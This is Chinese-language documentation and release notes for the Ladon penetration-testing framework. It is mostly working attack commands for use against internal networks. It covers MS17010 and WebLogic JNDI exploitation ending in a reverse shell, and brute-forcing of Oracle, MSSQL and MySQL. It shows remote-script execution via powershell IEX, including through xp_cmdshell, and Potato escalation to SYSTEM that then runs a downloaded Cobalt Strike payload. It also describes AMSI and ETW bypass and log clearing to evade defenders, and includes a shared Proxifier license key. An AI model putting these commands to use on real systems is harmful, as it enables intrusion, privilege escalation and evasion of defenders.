默认扫描速度很快,有些WAF或EDR防御很强
设置几线程都有可能20分钟左右就不能扫了
bypassEDR模拟人工访问,绕过速度检测策略
扫描速度较慢,追求速度的愣头青不要使用
1 | Ladon 10.1.2.8/24 MS17010 bypassEDR |
密码爆破相关模块暂不支持bypassEDR参数
例子:扫描目标10.1.2段是否存在MS17010漏洞
单线程:
1 | Ladon 10.1.2.8/24 MS17010 t=1 |
80线程:
1 | Ladon noping 10.1.2.8/24 MS17010 t=80 |
高强度防护下扫描线程设置低一些,F单线程
1 | Ladon 10.1.2.8/24 MS17010 f=1 |
例子:使用8线程扫描目标10.1.2段是否存在MS17010漏洞
1 | Ladon noping 10.1.2.8/24 MS17010 t=8<br> |
详见:http://k8gege.org/Ladon/proxy.html
PS:代理工具不支持Socks5,所以必须加noping参数扫描
不管是Frp还是其它同类工具,最主要是Proxifier等工具不支持ICMP协议
因为Ladon默认先用ICMP探测存活后,才使用对应模块测试
所以代理环境下得禁ping扫描,系统ping使用的就是ICMP协议
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
12.3:K8小密圈
Ladon 12.3 20231221
[+]SmbServer 一键SMB共享服务器,记录来访IP,访问资源等
[+]Win11ThemeRce CVE-2023-38146 Win11主题远程执行Exploit
Ladon SmbServer
Ladon Win11ThemeRce 192.168.1.8
程序同根目录下放share目录 stage_3可替换成自己的dll
在Win11机器上,双击win11poc.theme,将会弹出计算器
PS:需关闭系统SMB服务,不让445端口占用
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Oracle不同于MS SQL Server和Mysql数据库,可对用户配置权限
数据库名不对,是无法连接上数据库的,比方说你获取到的密码
是oracle admin123 只允许连接db888数据库 就是所说的SID
但是网上很多工具都是使用默认的orcl数据库 导致无法爆破
有可能会因此错过很多Oracle数据库机器权限
PS:SQL Server不指定数据库名也可以连 权限不够最多读取不了对应库的数据而已
但是填写默认的master库,即使是最低权限,也可连接上,就可用来验证爆破密码
而Oracle不行,填写默认的orcl,非授权用户是连不上的 不指定时Ladon默认跑orcl
1 | Ladon 192.168.1.8/24 OracleScan |
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
4 Oracle数据库,需要放个sid.txt里面存放数据库名称,Ladon先检测数据库存在才爆破
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 OracleScan”
./Ladon 192.168.1.8/24 OracleScan
12.15
[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置
Ladon 12.2 12.14
[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权
支持Windows/Linux/MacOS等服务器操作系统
支持高版本Oracle 12G、11G、12G及之前版本
GUI版 填写用户密码 Oracle一键提权远程执行命令
1 | Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m3 whoami |
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 | Ladon 192.168.1.8/24 MssqlScan |
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OrcleScan
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MssqlScan
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 MysqlScan”
./Ladon 192.168.1.8/24 MysqlScan
1 |
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
=============================================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1 | Ladon 192.168.1.8/24 MysqlScan |
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码
(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OrcleScan
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MssqlScan
powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 MysqlScan”
./Ladon 192.168.1.8/24 MysqlScan
1 |
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
Ladon和LadonGO用法一致 不限制后缀 访问doc也能执行hta
1 | Ladon HtaSer |
1 | ./Ladon HtaSer |
1 | HtaSer |
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
12.0:K8小密圈
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer
>= Ladon 7.2.0
Update: 20200810
通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。
1 本地NTLM中继获取SYSTEM令牌
2 SeImpersonatePrivilege特权
测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。如下方”Win7管理员提权至SYSTEM“图片上部分就是USER部分的Potato提权失败,下方是管理员权限,而其它环境都是IIS权限。所以为了方便Ladon默认也显示当前用户SeImpersonatePrivilege特权情况。
SweetPotato集成了原版Potato和JulyPotato的功能,包含DCOM/WINRM/PrintSpoofer方法获取SYSTEM。
1 | Load SweetPotato |
pipePotato:一种新型的通用提权漏洞,PrintSpoofer是一个利用打印机PIPE提权的方法,国人写了个工具叫BadPotato。
1 | Load BadPotato |
1 Win7 IIS 应用池用户权限
2 Win7 本地管理员用户权限
3 Win2012 IIS 应用池权限
4 Win7 本地服务用户权限
5 Win8 本地服务用户权限
PS:由于BadPotato不支持WIN7系统,所以以上环境主要以测试SweetPotato为主。
本地服务用户权限下直接以SYSTEM权限上控Cobalt Strike
http://k8gege.org/p/6b9b3afe.html
Ladon >= 12.2
1 | Ladon BadPotato cmdline |
1 | Ladon SweetPotato cmdline |
1 | Ladon EfsPotato whoami |
1 | Ladon McpPotato whoami |
1 | Ladon GodPotato whoami |
1 | Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr |
1 | powershell Import-Module .\Ladon.ps1;Ladon GodPotato whoami |
1 | powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1');Ladon GodPotato whoami |
http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html
Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]
网上找了些LPE,发现直接被Defender杀,病毒库更新至2021.1.19,Ladon没被杀,管理员UAC权限可通过BypassUac提权
执行SQL查询权限为network service
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx.800/Ladon.ps1''); Ladon SweetPotato "whoami""' |
1 | exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat' |
可ECHO写入添加管理员用户命令或者开3389等操作(举一反三不要只懂WHOAMI)
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""' |
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget http://k8gege.org/cs.exe"' |
1 | exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""' |
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
1 | cve-2023-36802 whoami |
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
11.9:K8小密圈
1 | Ladon PostShell <method> <url> <pwd> <type> <cmd> |
Cobalt Strike命令行PostShell
PostShell连接poswershell后门
PostShell连接nodejs后门
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
10.10.6:K8小密圈
1 | Ladon MndpInfo |
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
11.9:K8小密圈
Proxifier软件是一款极其强大的socks5客户端,同时也是一款强大的站长工具。Proxifier支持TCP,UDP协议,支持Xp,Vista,Win7,支持socks4,socks5,http代理协议可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。
V4.11 (2022.12.16) Proxifier 现在可以记录和阻止 UDP 连接
2020年7月proxifier官方发布最新版4.0.1修复ipv6兼容问题,以及其它很多问题。 3.42支持类似chrome这样工作的69个应用程序,修复了一些第三方应用程序的兼容性。
以上更新日志,充分说明该代理工具不能保证兼容所有第3方程序,或者说兼容性不好,同样的3.31版本有人能代理Ladon,有人代理不了。
官方下载: http://www.proxifier.com/download
ProxyChains遵循GNU协议的一款适用于linux系统的网络代理设置工具。强制由任一程序发起的TCP连接请求必须通过诸如TOR 或 SOCKS4, SOCKS5 或HTTP(S) 代理。支持的认证方式包括:SOCKS4/5的用户/密码认证,HTTP的基本认证。允许TCP和DNS通过代理隧道,并且可配置多个代理。
ProxyChains代理工具非常好,真的可以兼容所有程序,不像proxifier好多程序还不定兼容,当然两者都有一定的丢包率,Ladon批量扫描功能过快超时短,可能会导致有些结果丢失,回头设置一个代理模式,提高超时放慢速度看看。
通过以上两平台的代理工具简介,可以看出代理客户端并不支持ICMP协议。
所以使用它们代理,无法PING通内网主机。何况FRP、EW等也不支持ICMP。
1.TCP
2.UDP
1.SOCKS4
2.SOCKS5
3.HTTP(S)
推荐proxifier 3.42及以上版本,最好是最新版,3.31及以前的兼容性极差,所以不推荐,我使用VM虚拟机12版本的时候,可以代理Ladon,但后面升级为15,发现很难代理,就连测试系统自带的telnet程序,都不行了。Ladon在多个虚拟机测试也是一样,但是有同事也是用3.31却可以代理使用,网上很多人也和我反应不能用。后来我看了下3.31是2016年的,就想看看官方有没更新,发现18年有个3.42版本,测试一下,兼容好多了,然后在星球发表,发表不久发现官方更新了4.0.1,只是他没写更新日志,还以为没有更新。
4.11 (2022.12.16)
4.07 (2021.11.02)
4.05 (2021.03.09)
4.03 (2020.11.04)
4.0.1 (2020.7.7)
3.4.2 (2018.8.31)
3.3.1 (2016不推荐)
Standard Edition
用户名 k8gege.org
注册码 5EZ8G-C3WL5-B56YG-SCXM9-6QZAP
由于proxifier客户端不支持ICMP或者说ew等代理工具也不支持ICMP协议,所以代理后探测存活主机就不要使用Ping或OnlinePC模块了,使用扫描模块需加noping参数,非扫描模块不需要noping。探测存活主机可使用osscan、webscan、urlscan、ms17010、smbghost等模块,他们能扫出东西不也意味着主机存活吗?ping不是唯一的探测存活主机存活方式,系统防火墙默认禁ping,使用ping探测本身就会错过很多存活主机,所以实战要结合多种方式探测。假设目标防火墙只允许smb协议通过,你用nmap端口扫描的TCP包被拦截显示成关的,但用ms17010,smbghost扫出漏洞或者用smbscan就显示密码错误拒绝访问等,这不就说明445确实开放吗?不要死板的老是停留在ping和单纯的端口扫描来探测存活主机,要考虑实际环境,OnlinePC可探测到大部分存活主机,但不等于能探测到全部存活主机,当你无法渗透已扫到的存活主机,就得尝试其它模块探测更多主机。
PS:如何验证代理是否支持ICMP协议,非常简单用系统自带命令PING目标内网IP(不要PING自己的内网哦),能PING通目标存活IP,说明代理支持ICMP协议,意味你可以像挂了目标VPN一样或者像本地一样随意扫描目标内网,如果根本PING不通,老老实实扫描时加上noping参数。
例子:Socks5代理扫描目标10.1.2段是否存在MS17010漏洞
Ladon noping 10.1.2.8/24 MS17010
PS:再次强调,由于代理工具不支持ICMP,所以Ladon扫描类功能必须加noping参数,非扫描模块不需要。
Linux SSH服务识别之22端口扫描
WEB HttpBanner扫描
永恒之默漏洞 SMBghost CVE-2020-0796
OSSCAN探测目标操作系统
ProtScan端口扫描
Proxifier 现在可以记录和阻止 UDP 连接添加了一个主选项,用于控制负责 IP 地址泄漏预防的其他设置(配置文件->高级->DNS 和 IP 泄漏预防模式)添加了阻止非 A/AAAA DNS 查询的选项(配置文件->高级->如果 DNS 通过代理,则阻止非 A/AAAA 查询)可调整的日志窗口字体大小日志窗口呈现问题Proxifier、ProxyChecker 和 ServiceManager 中的多个小修复和改进
Windows on ARM 支持服务模式小优化无人值守模式下的安装(例如 SCCM)已修复便携式版本可能会在退出时导致其他应用程序崩溃Windows 高对比度模式支持
静默安装和卸载已修复“无法连接到占位符(假)IP 地址”错误已修复启用“DNS over Proxy”时改进的规则处理逻辑对于本地主机连接,IPv4 优先于 IPv6可自定义的假 IP 地址子网改进了与配置文件加载相关的错误处理在 UI 中更新和链接的文档日志窗口自动滚动固定改进的试用和许可证注册体验小的 UI 优化和改进
针对 IPv4 映射的 IPv6 连接修复了“无法连接到占位符(假)IP 地址”错误使用多个手动规则(从右键单击上下文菜单创建)时崩溃在某些情况下,启用代理名称解析后,系统连接可能无法正常工作各种小改进
发布版本安装/卸载逻辑得到改进拖放配置文件 (*.ppx)负载平衡链现在可以对同一个进程使用同一个代理
Proxifier 现在可以作为原生 Windows 服务运行Proxifier服务管理器工具(ServiceManager.exe)介绍Proxifier 便携版现已推出所有二进制文件都已在发布模式下编译由 UDP 端口 53 上的某些特定非 DNS 流量引起的 BSOD配置文件自动更新已修复日志性能得到改善较小的 UI 调整和优化
无法连接到占位符(假)IP 地址错误已修复Proxifier 退出时崩溃详细按钮添加到连接列表窗口不同屏幕日志和文件日志级别的正确处理驱动程序消息:397:g_NfeFlowListSize 太大错误已修复在重载下崩溃窗格自动隐藏时主菜单消失序号 381 无法定位在 ProxifierShellExt.dll 错误已修复其他改进和优化
(2020.07.07)
初始发行。
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
Proxifier: https://github.com/k8gege/K8tools
1 | Usage: |
EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)
批量检测CVE-2022-36537 Server Backup Manager 未授权RCE漏洞 上传是否可用
端口转发
[u]LadonGUI 文本处理,功能全改成中文(Win8及以上英文系统支持中文)
[+]EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)
[+]CVE-2022-36537 Server Backup Manager 未授权RCE漏洞检测 (Zookeeper)
[+]INI插件 超时30秒,自动结束进程,防批量PY卡死
[+]TXT文件 IP、URL等自动去重,只有str.txt不去重
[+]TXT文件 扫描TXT支持自定义线程数,不再默认100
[u]SshScan 修复ip.txt时重复扫N多密码的Bug
[+]PortForward 端口转发 端口中转
[+]默认信息 显示OS版本识别小版本号、.NET最高版本
[+]INI插件 支持$ip$、$url$、$tar$、$ip$:$port$、$ip$ $port$参数,自动处理格式,如tar.txt中有IP和URL,$ip$会把url处理成IP
[+]INI插件 支持参数处理,如INI里配置$ip$,读取tar.txt内容为http://192.168.1.8:8099,内容将处理成IP数据192.168.1.8,其他同理
[+]TXT文件 新增tar.txt、target.txt一样,传入参数为原始内容,如提供的是IP,Ladon不会处理成url,除非INI里指定,或模块自行处理
[+]TXT文件 修复读取url.txt host.txt 出现不完整问题,如http://backup.xxx.org 变成 http:ckup.xx.org 的Bug
EXP-2022-36537 Zookeeper 未授权文件读取EXP (默认/WEB-INF/web.xml)
批量检测CVE-2022-36537 Server Backup Manager 未授权RCE漏洞 上传是否可用
端口转发
[+]FtpServer 迷你FTP服务器,(支持windows/Linux自带ftp命令实现文件上传下载)
默认21 admin admin 可自定义端口 自定义用户、密码
[+]TcpServer 监听TCP发包数据 保存TXT和HEX 如SMB RDP HTTP SSH LDAP FTP等协议
[+]UdpServer 监听UDP发包数据 保存TXT和HEX 如DNS、SNMP等协议
[+]ArpInfo ARP协议探测存活主机IP和MAC,仅支持同一子网
[u]WebServer 迷你WEB服务器
[u]PortScan 移除9100端口
Ladon 10.10.2 20230402
[+]clsLog 清除崩溃日志、UsageLog日志、清除图标缓存、禁止UsageLog日志记录
[u]默认禁止基于.net程序UsageLog日志记录(如各类工具、powershell等)防止蓝队或EDR通过日志审计
[u]RunPS 无PowerShell.exe执行*.ps1脚本 新增内存绕过AMSI反病毒查杀接口
[+]默认Bypass ETW 绕过部分杀软和EDR监控
[+]HPreboot SNMP重启HP打印机 .net>=4.0
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon
9.1.1:http://k8gege.org/Download
攻击机:Windows
靶场:vulhub 12.2.1.3环境
允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致 RCE 漏洞
WebLogic_Server = 12.2.1.3.0
WebLogic_Server = 12.2.1.4.0
WebLogic_Server = 14.1.1.0.0
####(1)Ladon T3info模块探测 weblogic版本
探测到版本代表开启T3协议 版本符合可尝试是否存在漏洞
Ladon noping 192.168.188.2/24 T3info
Ladon 192.168.188.2:7001 T3info
Ladon http://192.168.188.2:7001 T3info
Ladon url.txt T3info
Ladon noping ip.txt T3info
LadonGo对应模块为T3scan
相关搜索引擎导出url,然后批量检测T3协议
Ladon url.txt T3info > T3ver.txt
当然也可以直接检测目标C段是否存在weblogic
Ladon noping ip24.txt T3info > T3ver.txt
Ladon noping 192.168.1.8/24 T3info > T3ver.txt
####(2)FindIP模块匹配目标
Key.txt存放LadonGUI处理的目标C段,当然手动也可以,使用
Ladon FindIP key.txt T3ver.txt
匹配C段是否出现在结果中,出现则有可能与目标有关,可以尝试GetShell
图片
####(3)使用网上开源工具https://github.com/4ra1n/CVE-2023-21839
GO编译
go build -o CVE-2023-21839.exe
####(4)漏洞检测
通过Ladon监听,无需dnslog等,不会向第3方泄露授权检测站点漏洞信息,部署在目标内网也可解决目标内网不出网无法利用目标内网存在相关漏洞的问题。
Ladon web 800
使用20230228后版本,不然批量LDAP时可能会崩溃
exp.exe -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:800
Ladon监听出现JNDI_LDAP字符串 代表存在JNDI注入漏洞
图片
####(4)反弹shell:
使用JNDI漏洞利用工具,在VPS开启服务,监听1389端口。
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.188.2 -l 1389 -p 9999
####(5)在VPS上使用Ladon监听端口:
Ladon NC监听 4444
####(6)在渗透机上执行以下命令
CVE-2023-21839 -ip 192.168.188.3 -port 7001 -ldap ldap://192.168.188.2:1389/Basic/ReverseShell/192.168.188.2/4444
图片
####(7)成功getshell
接下来就可以执行任意命令,linux也可以使用自带NC监听,对于windows可使用PowerLadon内存加载后渗透。
图片
Ladon 10.9 20230302
[u]LadonExp 编译EXE支持执行CMD Payload变量$cmd$ 变量$b64cmd$
[u]web CS版不含该模块 识别JAVA JNDI_LDAP JNDI_RMI请求
[u]WebLogicPoc CVE-2020-14883高危漏洞检测可识别出Windows或Linux
[-]PortTran CS版移除 端口转发工具
[u]Ladon911 本地测试用的全功能版(即保留旧漏洞和一些过时功能)
[-]Help 仅911版保留 功能很多 建议看Wiki或Ladon Study
[-]SMBGhost 仅CS和911版保留 Win10默认自动更新,实战遇到概率低
[-]vsFTPdPoc 仅CS和911版保留 2011漏洞过旧,实战遇到概率低
[-]CVE-2021-36934 仅CS和911版保留 Win10默认自动更新,实战可用概率低
[-]PhpStudyPoc 仅CS和911版保留
如果已整理好URL,可使用WhatCMS快速识别
1 | Ladon url.txt WhatCMS |
PowerLadon: https://github.com/k8gege/PowerLadon
历史版本: http://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download
10.10版本:K8小密圈
LadonGo一款开源内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。4.3版本包含43个模块功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell,10种协议密码爆破Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis,存活探测/信息收集/指纹识别OnlinePC、Ping、Icmp、SnmpScan,HttpBanner、HttpTitle、TcpBanner、WeblogicScan、OxidScan,端口扫描/服务探测PortScan。
. | . |
---|---|
OnlinePC | (Using ICMP/SNMP/Ping detect Online hosts) |
PingScan | (Using system ping to detect Online hosts) |
IcmpScan | (Using ICMP Protocol to detect Online hosts) |
SnmpScan | (Using Snmp Protocol to detect Online hosts) |
HttpBanner | (Using HTTP Protocol Scan Web Banner) |
HttpTitle | (Using HTTP protocol Scan Web titles) |
T3Scan | (Using T3 Protocol Scan Weblogic hosts) |
PortScan | (Scan hosts open ports using TCP protocol) |
TcpBanner | (Scan hosts open ports using TCP protocol) |
OxidScan | (Using dcom Protocol enumeration network interfaces) |
. | . |
---|---|
MS17010 | (Using SMB Protocol to detect MS17010 hosts) |
SmbGhost | (Using SMB Protocol to detect SmbGhost hosts) |
CVE-2021-21972 | (Check VMware vCenter 6.5 6.7 7.0 Rce Vul) |
CVE-2021-26855 | (Check CVE-2021-26855 Microsoft Exchange SSRF) |
. | . |
---|---|
SmbScan | (Using SMB Protocol to Brute-For 445 Port) |
SshScan | (Using SSH Protocol to Brute-For 22 Port) |
FtpScan | (Using FTP Protocol to Brute-For 21 Port) |
401Scan | (Using HTTP BasicAuth to Brute-For web Port) |
MysqlScan | (Using Mysql Protocol to Brute-For 3306 Port) |
MssqlScan | (Using Mssql Protocol to Brute-For 1433 Port) |
OracleScan | (Using Oracle Protocol to Brute-For 1521 Port) |
WinrmScan | (Using Winrm Protocol to Brute-For 5985 Port) |
SqlplusScan | (Using Oracle Sqlplus Brute-For 1521 Port) |
RedisScan | (Using Redis Protocol to Brute-For 6379 Port) |
. | . |
---|---|
SshCmd | (SSH Remote command execution Default 22 Port) |
WinrmCmd | (Winrm Remote command execution Default 5985 Port) |
PhpShell | (Php WebShell command execution Default 80 Port) |
. | . |
---|---|
PhpStudyDoor | (PhpStudy 2016 & 2018 BackDoor Exploit) |
1 | go get github.com/k8gege/LadonGo |
1 | make windows |
1 | make install |
1 | go run install.go |
Ladon help
Ladon Detection
Ladon BruteForce
Ladon IP/机器名/CIDR 扫描模块
Ping扫描C段存活主机(任意权限)
Ladon 192.168.1.8/24 PingScan
ICMP扫描C段存活主机(管理员权限)
Ladon 192.168.1.8/24 IcmpScan
SMB扫描C段永恒之蓝MS17010漏洞主机
Ladon 192.168.1.8/24 MS17010
SMB扫描C段永恒之黑SmbGhost漏洞主机
Ladon 192.168.1.8/24 SmbGhost
T3扫描C段开放WebLogic的主机
Ladon 192.168.1.8/24 T3Scan
HTTP扫描C段开放Web站点Banner
Ladon 192.168.1.8/24 BannerScan
扫描C段445端口Windows机器弱口令
Ladon 192.168.1.8/24 SmbScan
扫描C段22端口Linux机器SSH弱口令
Ladon 192.168.1.8/24 SshScan
扫描C段21端口FTP服务器弱口令
Ladon 192.168.1.8/24 SshScan
扫描C段3306端口Mysql服务器弱口令
Ladon 192.168.1.8/24 SshScan
1.和Ladon一样,ICMP探测C段仅需1秒
2.Ping扫描C段大约11秒,支持任意权限
3.其它模块自行测试
ID | OS |
---|---|
0 | WinXP |
1 | Win 2003 |
2 | Win 7 |
3 | Win 8.1 |
4 | Win 10 |
5 | Win 2008 R2 |
6 | Win 2012 R2 |
7 | Kali 2019 |
8 | SUSE 10 |
9 | CentOS 5.8 |
10 | CentOS 6.8 |
11 | Fedora 5 |
12 | RedHat 5.7 |
13 | BT5-R3 (Ubuntu 8) |
14 | MacOS 10.15 |
以上系统测试成功,其它系统未测,若某些系统不支持可自行编译
https://github.com/k8gege/LadonGo
历史版本: https://github.com/k8gege/Ladon/releases
911版本:http://k8gege.org/Download
10.10版本:K8小密圈
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ladon模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。10.9版本内置200个功能模块,外部模块18个,网络资产探测模块28个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
1 | using System; |
Demo的功能为打印存活IP,编译DLL,把DLL放在Ladon目录下,使用以下命令测试,结果将输出ICMP即可Ping通的机器IP,因为Ladon默认先使用ICMP探测存活主机,然后再执行插件内部对应的功能。
1 | Ladon netscan.dll 扫描当前机器所在C段 |
工程源码:https://github.com/k8gege/Ladon/blob/master/Demo_DLL.rar 使用VS2010或以上版本打开,若是ChatGPT生成的代码建议使用VS2015或之后版本,不然可能有些代码不能直接使用。
给它输入Ladon简明教程地址,它给我胡编了一个答案,逻辑能力非常强,简直以假乱真。应该根据很多类似工具参考生成了固定模板,你告诉它Ladon是渗透工具,它就胡编乱写一个简介,不熟悉Ladon的人一看估计以为它说的是真的。甚至我在群里看到有人发的人工智能说k8gege也是一款渗透工具,不知道它是不是用的旧版chatGPT,虽然乱说,但逻辑能力是非常强的。
让它把Ladon简介和版本说明做个排版,效果非常棒
跟它聊天或做个表格,那就太小看它了,对于渗透或开发人员,我们可以让它帮我们写一些简单工具,或者一些功能模块。大家都知道Ladon工具的插件开发非常简单,一是直接配置INI插件,二是LadonEXP一键生成,三是自己编程实现。三的要求相对高一点,需要使用人员有一定编程能力。
我们让ChatGPT参考插件例子源码,让它使用C#编写一个获取网页标题的插件
没等几秒钟,它立即给出以下代码
打开demo工程,复制它给的代码,全选粘贴到工程里面去,编译并运行,测试看看
运行结果报错,原因是我们扫描的是C段IP,即传入参数是IP,但获取网页标题需要的是URL,所以还得让它把IP处理成URL
经过它的修改,可以成功获取网页标题,由于扫的是C段,我们并不知道哪个IP上面部署了IIS7,所以得让它把结果改下
很快它又改好代码,再次编译测试
测试发现除了获取标题外,还回显了很多访问不到的URL
